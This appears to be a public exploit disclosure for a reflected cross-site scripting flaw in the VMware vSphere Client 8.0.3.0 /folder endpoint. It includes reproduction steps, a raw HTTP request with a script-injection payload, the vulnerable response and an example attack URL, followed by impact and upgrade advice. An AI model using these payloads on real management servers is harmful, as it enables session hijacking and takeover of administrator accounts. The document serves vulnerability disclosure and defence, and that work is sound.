CVE-2025-41228 - VMware vSphere Client 8.0.3.0 XSS

Vulnerability Overview

A reflected Cross-Site Scripting (XSS) vulnerability exists in VMware vSphere Client version 8.0.3.0. The application fails to sanitize input passed via a query string to the /folder endpoint, resulting in arbitrary JavaScript execution when the reflected value is rendered into an HTML form’s action attribute.

Attack Vector: Network (web interface)
Attack Complexity: Low
Privileges Required: Valid authenticated session required to trigger in-browser execution
User Interaction: None (when attacker can induce a victim to visit the crafted URL)
CVE: CVE-2025-41228

Description

The vulnerable endpoint reflects query string input directly into a form action attribute without proper encoding. An attacker who can obtain or coerce an authenticated administrator into opening a crafted URL can achieve arbitrary script execution in the admin's browser context.

Steps to Reproduce

1. Initiate a benign request:

https://host/folder?ht7j4

2. Intercept and modify the request using a proxy (e.g., Burp Suite). Inject payload into the query string:

GET /folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1 HTTP/2
Host: 192.168.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Referer: https://192.168.x.x/
Accept: text/html,application/xhtml+xml

3. Forward the request. Inspect the HTTP response. The payload appears unencoded inside an HTML form:

<form action="/folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1" method="POST">
  <input name="VMware-CSRF-Token" type="hidden" value="..." />

4. To observe execution, replay the exact malicious request in a browser with an active authenticated session (cookies present) or use Burp's "Open in Browser" with session cookies.

Example payload URL:

https://192.168.x.x/folder?ht7j4"><script>alert(1)</script>tnkav=1

Impact

Arbitrary JavaScript execution within the vSphere Client web interface. Possible consequences:

• Session hijacking
• Administrative actions via CSRF
• Credential theft or phishing within the admin context
• Further pivoting inside management workflows

Recommendation

Upgrade to VMware vCenter Server 8.0 U3e or later which addresses CVE-2025-41228. If immediate upgrade is not possible:

• Restrict access to management interfaces to trusted networks and IP ranges.
• Require VPN or jump-host access for administrative consoles.
• Apply Content Security Policy (CSP) and additional web-layer controls where feasible.
• Monitor administrative sessions and anomalous requests to /folder.

References

• NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41228
• VMware Security Advisories: https://www.vmware.com/security/advisories

Credits

Discovered / PoC Author: Imraan Khan (Lich-Sec)
EDB ID: 52406
CVE: CVE-2025-41228

---

⚠️ DISCLAIMER: This document reproduces public exploit disclosure material for defensive and research use. Test only on systems you own or are authorized to test. Unauthorized exploitation is illegal.